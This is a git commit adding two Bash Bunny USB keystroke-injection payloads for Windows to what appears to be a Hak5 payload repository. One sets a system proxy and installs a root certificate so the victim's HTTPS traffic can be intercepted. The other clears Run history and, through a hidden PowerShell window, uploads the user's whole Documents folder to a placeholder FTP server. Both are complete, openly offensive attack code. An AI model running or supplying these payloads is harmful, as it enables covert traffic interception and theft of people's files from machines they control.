pull/71/merge
Darren Kitchen 2017-04-07 16:56:56 +10:00
commit 9deb63d268
9 changed files with 258 additions and 0 deletions

View File

@ -0,0 +1,6 @@
#Import variables from vars.ps1 for use.
. .\vars.ps1
#Add certificate to certificate store
$certFile = ( Get-ChildItem -Path $certName )
$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root

View File

@ -0,0 +1,30 @@
# Proxy Interceptor for Bash Bunny
Author: NightStalker
Version: 1.0
## Description
This payload will enable a proxy and import an SSL certificate to a Windows
computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
The script uses a combination of Ducky Code and PowerShell.
*Note: Currently no falure LED, if remains red for more than 60 seconds
script failed. Will build checks in later version.
## Requirements
Certificate needs to be in .pem format and in the root switch directory with
payload.txt, set the certificate and proxy information in the vars.ps1 file.
## STATUS
| LED | Status |
| ---------------- | ------------------------------------- |
| White (blinking) | Script Running. |
| Purple (blinging)| Script Complete. |
## Discussion
https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/

View File

@ -0,0 +1,19 @@
#Import variables from vars.ps1 for use.
. .\vars.ps1
#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
if ($ieProcess) {
$ieProcess.CloseMainWindow()
Sleep 5
if (!$ieProcess.HasExited) {
$ieProcess | Stop-Process -Force
}
}
Remove-Variable ieProcess
#Change the proxy settings in the registry
$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Set-ItemProperty -path $regKey ProxyEnable -value 1
Set-ItemProperty -path $regKey ProxyServer -value $proxyVal

View File

@ -0,0 +1,4 @@
-----BEGIN CERTIFICATE-----
REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
FROM PROXY FOR SSL INTERCEPTION.
-----END CERTIFICATE-----

View File

@ -0,0 +1,65 @@
#!/bin/bash
#
# Title: Proxy Interceptor
# Author: NightStalker
# Version: 1.0
#
#This payload will enable a proxy and import an SSL certificate to a Windows
#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
#The script uses a combination of Ducky Code and PowerShell.
#
# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
#
# Red Blinking.............Running Payload
# Purple Blinking .........Payload Completed
#Set Red LED to indicate Starting of Script
LED R 50
#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
ATTACKMODE HID STORAGE
#Import Bunny Helpers
source bunny_helpers.sh
#Start of Script
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 100
#Change to the directory of the Bunny with the proper switch location
Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
Q ENTER
Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
Q ENTER
Q STRING cd \$absPath
Q ENTER
Q DELAY 500
#Set the proxy in the internet settings in the registry (For IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
Q ENTER
Q DELAY 500
#Import the certificate to the computer (for IE and Chrome).
Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
#Unmount the USB Drive.
Q STRING \$driveEject = New-Object -comObject Shell.Application
Q ENTER
Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 500
Q ALT t
Q DELAY 500
Q STRING EXIT
Q ENTER
sync
LED R B 100

View File

@ -0,0 +1,3 @@
#Set variables for use in payload.
$proxyVal = "proxyip:port"
$certName = "cert.pem"

View File

@ -0,0 +1,78 @@
clear
#Clear Run History
remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb
# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how
# FTP Server Variables - edit the xxxxx
$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/'
$FTPUser = 'xxxxx'
$FTPPass = 'xxxxx'
#Directory where to find files to upload
$UploadFolder = "$env:userprofile\Documents\"
$webclient = New-Object System.Net.WebClient
$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass)
$SrcEntries = Get-ChildItem $UploadFolder -Recurse
$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer}
$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer}
#Creates Folder with victims Username
try {
$makeDirectory = [System.Net.WebRequest]::Create($FTPHost);
$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
$makeDirectory.GetResponse();
}
catch [Net.WebException] {}
# Create FTP Directory/SubDirectory If Needed - Start
foreach($folder in $Srcfolders)
{
$SrcFolderPath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
$DesFolder = $folder.Fullname -replace $SrcFolderPath,$FTPHost
$DesFolder = $DesFolder -replace "\\", "/"
# Write-Output $DesFolder
try
{
$makeDirectory = [System.Net.WebRequest]::Create($DesFolder);
$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
$makeDirectory.GetResponse();
#folder created successfully
}
catch [Net.WebException]
{
try {
#if there was an error returned, check if folder already existed on server
$checkDirectory = [System.Net.WebRequest]::Create($DesFolder);
$checkDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
$checkDirectory.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory;
$response = $checkDirectory.GetResponse();
#folder already exists!
}
catch [Net.WebException] {
#if the folder didn't exist
}
}
}
# Create FTP Directory/SubDirectory If Needed - Stop
# Upload Files - Start
foreach($entry in $SrcFiles)
{
$SrcFullname = $entry.fullname
$SrcName = $entry.Name
$SrcFilePath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
$DesFile = $SrcFullname -replace $SrcFilePath,$FTPHost
$DesFile = $DesFile -replace "\\", "/"
# Write-Output $DesFile
$uri = New-Object System.Uri($DesFile)
$webclient.UploadFile($uri, $SrcFullname)
}
# Upload Files - Stop

View File

@ -0,0 +1,27 @@
#!/bin/bash
#
# Title: FTP Exfiltrator
# Author: Nutt
# Version: 1.0
# Target: Windows
#
#Exfiltrates files from the users Documents folder
#FTP's all files/folders to a specified FTP site named by the victim hostname.
#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
#Executes 1.ps1
#Purple.........Setup
#Red............Failed - Need to work on
#Green..........Finished
# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
source bunny_helpers.sh
LED R B
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
QUACK ENTER
LED G

View File

@ -0,0 +1,26 @@
# FTP Exfiltrator for Bash Bunny
* Author: Nutt
* Version: Version 1.0
* Target: Windows
## Description
Exfiltrates files from the users Documents folder
FTP's all files/folders to a specified FTP site named by the victim hostname.
Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
## Configuration
Edit 1.ps1 to specify FTP site, username and password
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple | Setup |
| Red | Failed - Not working yet |
| Green | Attack Complete |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40492-payload-ftp-exfiltrator/ "Hak5 Forum Thread")